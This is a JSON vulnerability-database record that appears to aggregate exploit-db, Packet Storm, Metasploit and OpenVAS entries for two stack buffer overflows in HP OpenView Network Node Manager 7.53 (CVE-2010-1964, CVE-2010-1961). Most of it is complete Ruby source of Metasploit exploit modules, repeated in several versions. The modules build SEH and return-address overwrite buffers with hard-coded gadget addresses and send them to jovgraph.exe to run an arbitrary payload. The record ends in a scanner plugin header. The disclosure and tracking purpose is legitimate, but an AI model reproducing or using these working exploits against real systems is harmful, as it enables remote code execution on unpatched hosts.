\"POST\",\r\n\t\t\t\t'vars_post' =>\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'sel' => sel,\r\n\t\t\t\t\t\t'act' => action,\r\n\t\t\t\t\t\t'arg' => buf\r\n\t\t\t\t\t}\r\n\t\t\t}, 3)\r\n\t\telse\r\n\t\t\tprint_status(\"Sending exploit via GET request...\")\r\n\t\t\tres = send_request_cgi({\r\n\t\t\t\t'uri'\t\t => cgi,\r\n\t\t\t\t'method'\t => \"GET\",\r\n\t\t\t\t'vars_get' =>\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'sel' => sel,\r\n\t\t\t\t\t\t'act' => action,\r\n\t\t\t\t\t\t'arg' => buf\r\n\t\t\t\t\t}\r\n\t\t\t}, 3)\r\n\t\tend\r\n\r\n\t\tif not res\r\n\t\t\traise RuntimeError, \"Eek! We didn't get a response.. Exploiting this vuln should return one!\"\r\n\t\tend\r\n\r\n\t\tprint_status(res.body) if datastore[\"NNM_DEBUG\"]\r\n\r\n\t\tif res.body =~ /graphing applet is being/\r\n\t\t\tprint_status(\"We got the body we were looking for, the session should be coming any second.\")\r\n\t\telse\r\n\t\t\traise RuntimeError, \"Eek, exploit likely failed. The body didn't contain what we expected.\"\r\n\t\tend\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\n\tdef wfs_delay\r\n\t\t5\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17044/"}], "packetstorm": [{"lastseen": "2016-12-05T22:14:50", "references": [], "edition": 1, "description": "", "reporter": "jduck", "published": "2011-03-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "packetstorm", "title": "HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1964", "CVE-2010-1961"], "modified": "2011-03-24T00:00:00", "href": "https://packetstormsecurity.com/files/99676/HP-OpenView-Network-Node-Manager-ovwebsnmpsrv.exe-main-Buffer-Overflow.html", "id": "PACKETSTORM:99676", "sourceData": "`## \n# $Id: hp_nnm_ovwebsnmpsrv_main.rb 12097 2011-03-23 15:45:48Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \nHttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ } \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 \nprior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' \nCGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. \n \nThis vulnerability is triggerable via either a GET or POST request. The buffer being \nwritten to is 1024 bytes in size. It is important to note that this vulnerability must \nbe exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered! \n \nThe vulnerable code is within the \"main\" function within \"ovwebsnmpsrv.exe\" with a \ntimestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is \neasily achieved by overwriting SEH structures. \n \nThere exists some unreliability when running this exploit. It is not completely clear why \nat this time, but may be related to OVWDB or session management. Also, on some attempts \nOV NNM may report invalid characters in the URL. It is not clear what is causing this \neither. \n} , \n'Author' => \n[ \n'jduck' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 12097 $', \n'References' => \n[ \n[ 'CVE', '2010-1964' ], \n[ 'OSVDB', '65552' ], \n[ 'BID', '40873' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-108/' ], \n[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 1024, # 1024 byte buffer.. \n# In addition to regular HTTP type bad chars, this one also has \n# an issue with \" since the buffer is being passed on the command line. \n'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\\x22\\x24\\x2c\\x3b\\x60\", \n'DisableNops' => true, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'HP OpenView Network Node Manager 7.53 w/NNM_01201', \n{ \n'Ret' => 0x5a02aadf, # pop edx/pop ebp/ret - in ov.dll (v1.30.10.9166) \n} \n], \n[ 'HP OpenView Network Node Manager 7.53 (Windows 2003)', \n{ \n'Ret' => 0x71c069dd, # pop edx/pop ecx/ret - in ws2_32.dll v5.2.3790.3959 \n} \n], \n[ 'Debug Target', \n{ \n'Ret' => 0xdeadbeef, # crasher \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'June 16 2010')) \n \nregister_options( \n[ \nOpt::RPORT(80), \n], self.class) \nend \n \ndef exploit \n \nprint_status(\"Trying target #{target.name}...\") \n \ncgi = '/OvCgi/jovgraph.exe' \n \n# Any command line parameter will cause a buffer overflow. \n \n# \"action\" must be set \naction = rand_text_alphanumeric(1) \n \n# \"sel\" must be set \nsel = rand_text_alphanumeric(1) \n \n# \"timestamp\" cannot be set. \n \n# SEH \nseh_offset = 1132 \nseh_frame = generate_seh_record(target.ret) \n \n# Jump back to the payload, after p/p/r jumps to us. \ndistance = seh_offset + seh_frame.length \ndistance -= 1 # skip the first byte (cannot be -/+) \njmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string \n \n# Create the buffer \nbuf = '' \n# The first character cannot be a - or a + \nbuf << rand_text(1, payload_badchars + \"+-\") \nbuf << payload.encoded \nbuf << rand_text(seh_offset - buf.length) \nbuf << seh_frame \nbuf << jmp_back \n \n# Force an exception writing off the end of the stack \nbuf << rand_text(6500 - buf.length) \n \n# Send the request \nif rand(2) > 0 \nprint_status(\"Sending exploit via POST request...\") \nres = send_request_cgi({ \n'uri' => cgi, \n'method' => \"POST\", \n'vars_post' => \n{ \n'sel' => sel, \n'act' => action, \n'arg' => buf \n} \n}, 3) \nelse \nprint_status(\"Sending exploit via GET request...\") \nres = send_request_cgi({ \n'uri' => cgi, \n'method' => \"GET\", \n'vars_get' => \n{ \n'sel' => sel, \n'act' => action, \n'arg' => buf \n} \n}, 3) \nend \n \nif not res \nraise RuntimeError, \"Eek! We didn't get a response.. Exploiting this vuln should return one!\" \nend \n \nprint_status(res.body) if datastore[\"NNM_DEBUG\"] \n \nif res.body =~ /graphing applet is being/ \nprint_status(\"We got the body we were looking for, the session should be coming any second.\") \nelse \nraise RuntimeError, \"Eek, exploit likely failed. The body didn't contain what we expected.\" \nend \n \nhandler \n \nend \n \ndef wfs_delay \n5 \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/99676/hp_nnm_ovwebsnmpsrv_main.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:25:36", "references": [], "edition": 1, "description": "", "reporter": "jduck", "published": "2011-03-24T00:00:00", "type": "packetstorm", "title": "HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1964", "CVE-2010-1961"], "modified": "2011-03-24T00:00:00", "href": "https://packetstormsecurity.com/files/99677/HP-OpenView-Network-Node-Manager-ovwebsnmpsrv.exe-ovutil-Buffer-Overflow.html", "id": "PACKETSTORM:99677", "sourceData": "`## \n# $Id: hp_nnm_ovwebsnmpsrv_ovutil.rb 12096 2011-03-23 15:44:55Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \nHttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ } \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 \nprior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' \nCGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. \n \nThis vulnerability is triggerable via either a GET or POST request. It is interesting to \nnote that this vulnerability cannot be exploited by overwriting SEH, since attempting \nto would trigger CVE-2010-1964. \n \nThe vulnerable code is within a sub-function called from \"main\" within \"ovwebsnmpsrv.exe\" \nwith a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer \nwhich is passed to the \"getProxiedStorageAddress\" function within ovutil.dll. When \nprocessing the address results in an error, the buffer is overflowed in a call to sprintf_new. \nThere are no stack cookies present, so exploitation is easily achieved by overwriting the \nsaved return address. \n \nThere exists some unreliability when running this exploit. It is not completely clear why \nat this time, but may be related to OVWDB or session management. Also, on some attempts \nOV NNM may report invalid characters in the URL. It is not clear what is causing this \neither. \n} , \n'Author' => \n[ \n'jduck' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 12096 $', \n'References' => \n[ \n[ 'CVE', '2010-1961' ], \n[ 'OSVDB', '65428' ], \n[ 'BID', '40638' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-106/' ], \n[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 512, # 256 byte buffer.. \n# In addition to regular HTTP type bad chars, this one also has \n# an issue with \" since the buffer is being passed on the command line. \n'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\\x22\\x24\\x2c\\x3b\\x60\", \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", \n'DisableNops' => true, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'HP OpenView Network Node Manager 7.53 w/NNM_01201', \n{ \n'PopPopRet' => 0x5a02aadf, # pop edx/pop ebp/ret - in ov.dll (v1.30.10.9166) \n'JmpEsp' => 0x5a219880, # jmp esp - in ovsnmp.dll (v1.30.10.9166) \n} \n], \n[ 'HP OpenView Network Node Manager 7.53 (Windows 2003)', \n{ \n'PopPopRet' => 0x71c069dd, # pop edx/pop ecx/ret - in ws2_32.dll v5.2.3790.3959 \n'JmpEsp' => 0x5a219880, # jmp esp - in ovsnmp.dll (v1.30.10.9166) \n} \n], \n[ 'Debug Target', \n{ \n'PopPopRet' => 0xdeadbeef, # crasher \n'JmpEsp' => 0xbeefcafe \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'June 16 2010')) \n \nregister_options( \n[ \nOpt::RPORT(80), \n], self.class) \nend \n \ndef exploit \n \nprint_status(\"Trying target #{target.name}...\") \n \ncgi = '/OvCgi/jovgraph.exe' \n \n# Any command line parameter will cause a buffer overflow. \n \n# \"action\" must be set \naction = rand_text_alphanumeric(1) \n \n# \"sel\" must be set \nsel = rand_text_alphanumeric(1) \n \n# \"timestamp\" cannot be set. \n \nstart = 'No entry for ' \n \nret_offset = 256 + 4 + 12 + 4 \n \n# Create the buffer \nbuf = '' \nbuf << rand_text(ret_offset - start.length) \nbuf << [target['PopPopRet']].pack('V') \nbuf << [0x5a400141].pack('V') # ptr to zero \nbuf << [0x5a459fdc].pack('V') # ptr to writable scratch \nbuf << [target['JmpEsp']].pack('V') \n#buf << \"\\xcc\" \nbuf << payload.encoded \n \n# Ugh, triggers cve-2010-1964 \n#buf = pattern_create(1456) \n \n# Send the request \nif rand(2) > 0 \nprint_status(\"Sending exploit via POST request...\") \nres = send_request_cgi({ \n'uri' => cgi, \n'method' => \"POST\", \n'vars_post' => \n{ \n'sel' => sel, \n'act' => action, \n'arg' => buf \n} \n}, 3) \nelse \nprint_status(\"Sending exploit via GET request...\") \nres = send_request_cgi({ \n'uri' => cgi, \n'method' => \"GET\", \n'vars_get' => \n{ \n'sel' => sel, \n'act' => action, \n'arg' => buf \n} \n}, 3) \nend \n \nif not res \nraise RuntimeError, \"Eek! We didn't get a response.. Exploiting this vuln should return one!\" \nend \n \nprint_status(res.body) if datastore[\"NNM_DEBUG\"] \n \nif res.body =~ /graphing applet is being/ \nprint_status(\"We got the body we were looking for, the session should be coming any second.\") \nelse \nraise RuntimeError, \"Eek, exploit likely failed. The body didn't contain what we expected.\" \nend \n \nhandler \n \nend \n \ndef wfs_delay \n5 \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/99677/hp_nnm_ovwebsnmpsrv_ovutil.rb.txt"}], "metasploit": [{"lastseen": "2018-09-24T23:29:53", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. It is interesting to note that this vulnerability cannot be exploited by overwriting SEH, since attempting to would trigger CVE-2010-1964. The vulnerable code is within a sub-function called from \"main\" within \"ovwebsnmpsrv.exe\" with a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer which is passed to the \"getProxiedStorageAddress\" function within ovutil.dll. When processing the address results in an error, the buffer is overflowed in a call to sprintf_new. There are no stack cookies present, so exploitation is easily achieved by overwriting the saved return address. There exists some unreliability when running this exploit. It is not completely clear why at this time, but may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either.", "reporter": "Rapid7", "published": "2011-03-23T15:44:55", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb", "type": "metasploit", "title": "HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1961", "CVE-2010-1964"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Great", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_OVWEBSNMPSRV_OVUTIL", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ }\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\n This vulnerability is triggerable via either a GET or POST request. It is interesting to\n note that this vulnerability cannot be exploited by overwriting SEH, since attempting\n to would trigger CVE-2010-1964.\n\n The vulnerable code is within a sub-function called from \"main\" within \"ovwebsnmpsrv.exe\"\n with a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer\n which is passed to the \"getProxiedStorageAddress\" function within ovutil.dll. When\n processing the address results in an error, the buffer is overflowed in a call to sprintf_new.\n There are no stack cookies present, so exploitation is easily achieved by overwriting the\n saved return address.\n\n There exists some unreliability when running this exploit. It is not completely clear why\n at this time, but may be related to OVWDB or session management. Also, on some attempts\n OV NNM may report invalid characters in the URL. It is not clear what is causing this\n either.\n } ,\n 'Author' =>\n [\n 'jduck' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2010-1961' ],\n [ 'OSVDB', '65428' ],\n [ 'BID', '40638' ],\n [ 'ZDI', '10-106' ],\n [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 512, # 256 byte buffer..\n # In addition to regular HTTP type bad chars, this one also has\n # an issue with \" since the buffer is being passed on the command line.\n 'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\\x22\\x24\\x2c\\x3b\\x60\",\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\",\n 'DisableNops' => true,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'HP OpenView Network Node Manager 7.53 w/NNM_01201',\n {\n 'PopPopRet' => 0x5a02aadf, # pop edx/pop ebp/ret - in ov.dll (v1.30.10.9166)\n 'JmpEsp' => 0x5a219880, # jmp esp - in ovsnmp.dll (v1.30.10.9166)\n }\n ],\n [ 'HP OpenView Network Node Manager 7.53 (Windows 2003)',\n {\n 'PopPopRet' => 0x71c069dd, # pop edx/pop ecx/ret - in ws2_32.dll v5.2.3790.3959\n 'JmpEsp' => 0x5a219880, # jmp esp - in ovsnmp.dll (v1.30.10.9166)\n }\n ],\n [ 'Debug Target',\n {\n 'PopPopRet' => 0xdeadbeef, # crasher\n 'JmpEsp' => 0xbeefcafe\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jun 16 2010'))\n end\n\n def exploit\n\n print_status(\"Trying target #{target.name}...\")\n\n cgi = '/OvCgi/jovgraph.exe'\n\n # Any command line parameter will cause a buffer overflow.\n\n # \"action\" must be set\n action = rand_text_alphanumeric(1)\n\n # \"sel\" must be set\n sel = rand_text_alphanumeric(1)\n\n # \"timestamp\" cannot be set.\n\n start = 'No entry for '\n\n ret_offset = 256 + 4 + 12 + 4\n\n # Create the buffer\n buf = ''\n buf << rand_text(ret_offset - start.length)\n buf << [target['PopPopRet']].pack('V')\n buf << [0x5a400141].pack('V') # ptr to zero\n buf << [0x5a459fdc].pack('V') # ptr to writable scratch\n buf << [target['JmpEsp']].pack('V')\n #buf << \"\\xcc\"\n buf << payload.encoded\n\n # Ugh, triggers cve-2010-1964\n #buf = pattern_create(1456)\n\n # Send the request\n if rand(2) > 0\n print_status(\"Sending exploit via POST request...\")\n res = send_request_cgi({\n 'uri'\t\t => cgi,\n 'method'\t => \"POST\",\n 'vars_post' =>\n {\n 'sel' => sel,\n 'act' => action,\n 'arg' => buf\n }\n }, 3)\n else\n print_status(\"Sending exploit via GET request...\")\n res = send_request_cgi({\n 'uri'\t\t => cgi,\n 'method'\t => \"GET\",\n 'vars_get' =>\n {\n 'sel' => sel,\n 'act' => action,\n 'arg' => buf\n }\n }, 3)\n end\n\n if not res\n fail_with(Failure::Unknown, \"Eek! We didn't get a response.. Exploiting this vuln should return one!\")\n end\n\n print_status(res.body) if datastore[\"NNM_DEBUG\"]\n\n if res.body =~ /graphing applet is being/\n print_status(\"We got the body we were looking for, the session should be coming any second.\")\n else\n fail_with(Failure::Unknown, \"Eek, exploit likely failed. The body didn't contain what we expected.\")\n end\n\n handler\n\n end\n\n def wfs_delay\n 5\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb"}, {"lastseen": "2018-09-26T19:35:48", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "references": [], "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. The buffer being written to is 1024 bytes in size. It is important to note that this vulnerability must be exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered! The vulnerable code is within the \"main\" function within \"ovwebsnmpsrv.exe\" with a timestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is easily achieved by overwriting SEH structures. There exists some unreliability when running this exploit. It is not completely clear why at this time, but may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either.", "reporter": "Rapid7", "published": "2011-03-23T15:45:48", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb", "type": "metasploit", "title": "HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1961", "CVE-2010-1964"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Great", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_OVWEBSNMPSRV_MAIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ }\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\n This vulnerability is triggerable via either a GET or POST request. The buffer being\n written to is 1024 bytes in size. It is important to note that this vulnerability must\n be exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered!\n\n The vulnerable code is within the \"main\" function within \"ovwebsnmpsrv.exe\" with a\n timestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is\n easily achieved by overwriting SEH structures.\n\n There exists some unreliability when running this exploit. It is not completely clear why\n at this time, but may be related to OVWDB or session management. Also, on some attempts\n OV NNM may report invalid characters in the URL. It is not clear what is causing this\n either.\n } ,\n 'Author' =>\n [\n 'jduck' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2010-1964' ],\n [ 'OSVDB', '65552' ],\n [ 'BID', '40873' ],\n [ 'ZDI', '10-108' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 1024, # 1024 byte buffer..\n # In addition to regular HTTP type bad chars, this one also has\n # an issue with \" since the buffer is being passed on the command line.\n 'BadChars' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\\x22\\x24\\x2c\\x3b\\x60\",\n 'DisableNops' => true,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'HP OpenView Network Node Manager 7.53 w/NNM_01201',\n {\n 'Ret' => 0x5a02aadf, # pop edx/pop ebp/ret - in ov.dll (v1.30.10.9166)\n }\n ],\n [ 'HP OpenView Network Node Manager 7.53 (Windows 2003)',\n {\n 'Ret' => 0x71c069dd, # pop edx/pop ecx/ret - in ws2_32.dll v5.2.3790.3959\n }\n ],\n [ 'Debug Target',\n {\n 'Ret' => 0xdeadbeef, # crasher\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jun 16 2010'))\n end\n\n def exploit\n\n print_status(\"Trying target #{target.name}...\")\n\n cgi = '/OvCgi/jovgraph.exe'\n\n # Any command line parameter will cause a buffer overflow.\n\n # \"action\" must be set\n action = rand_text_alphanumeric(1)\n\n # \"sel\" must be set\n sel = rand_text_alphanumeric(1)\n\n # \"timestamp\" cannot be set.\n\n # SEH\n seh_offset = 1132\n seh_frame = generate_seh_record(target.ret)\n\n # Jump back to the payload, after p/p/r jumps to us.\n distance = seh_offset + seh_frame.length\n distance -= 1 # skip the first byte (cannot be -/+)\n jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\n\n # Create the buffer\n buf = ''\n # The first character cannot be a - or a +\n buf << rand_text(1, payload_badchars + \"+-\")\n buf << payload.encoded\n buf << rand_text(seh_offset - buf.length)\n buf << seh_frame\n buf << jmp_back\n\n # Force an exception writing off the end of the stack\n buf << rand_text(6500 - buf.length)\n\n # Send the request\n if rand(2) > 0\n print_status(\"Sending exploit via POST request...\")\n res = send_request_cgi({\n 'uri'\t\t => cgi,\n 'method'\t => \"POST\",\n 'vars_post' =>\n {\n 'sel' => sel,\n 'act' => action,\n 'arg' => buf\n }\n }, 3)\n else\n print_status(\"Sending exploit via GET request...\")\n res = send_request_cgi({\n 'uri'\t\t => cgi,\n 'method'\t => \"GET\",\n 'vars_get' =>\n {\n 'sel' => sel,\n 'act' => action,\n 'arg' => buf\n }\n }, 3)\n end\n\n if not res\n fail_with(Failure::Unknown, \"Eek! We didn't get a response.. Exploiting this vuln should return one!\")\n end\n\n print_status(res.body) if datastore[\"NNM_DEBUG\"]\n\n if res.body =~ /graphing applet is being/\n print_status(\"We got the body we were looking for, the session should be coming any second.\")\n else\n fail_with(Failure::Unknown, \"Eek, exploit likely failed. The body didn't contain what we expected.\")\n end\n\n handler\n\n end\n\n def wfs_delay\n 5\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb"}], "openvas": [{"lastseen": "2018-09-02T00:05:21", "references": ["http://xforce.iss.net/xforce/xfdb/59249", "http://securitytracker.com/alerts/2010/Jun/1024071.html", "http://seclists.org/bugtraq/2010/Jun/152", "http://marc.info/?l=bugtraq&m=128525454219838&w=2", "http://xforce.iss.net/xforce/xfdb/59250", "http://secunia.com/advisories/40101"], "pluginID": "1361412562310902076", "description": "This host is running HP OpenView Network Node Manager and\n is prone to multiple vulnerabilities.", "edition": 3, "reporter": "Copyright (C) 2010 SecPod", "published": "2010-06-22T00:00:00", "title": "HP OpenView Network Node Manager Multiple Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1964", "CVE-2010-3285", "CVE-2010-1961", "CVE-2010-1960"], "modified": "2017-02-27T00:00:00", "id": "OPENVAS:1361412562310902076", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902076", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_hp_openview_nnm_mult_vuln.nasl 5428 2017-02-27 07:50:09Z cfi $\n#\n# HP OpenView Network Node Manager Multiple Vulnerabilities\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Updated By: Sooraj KS <kssooraj@secpod.com> on 2010-09-28\n# Added the related CVE and description.\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:hp:openview_network_node_manager\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902076\");\n script_version(\"$Revision: 5428 $\");\n script_cve_id(\"CVE-2010-1964\", \"CVE-2010-1961\", \"CVE-2010-1960\", \"CVE-2010-3285\");\n script_bugtraq_id(40873, 40637, 40638);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-27 08:50:09 +0100 (Mon, 27 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-22 14:43:46 +0200 (Tue, 22 Jun 2010)\");\n script_name(\"HP OpenView Network Node Manager Multiple Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n 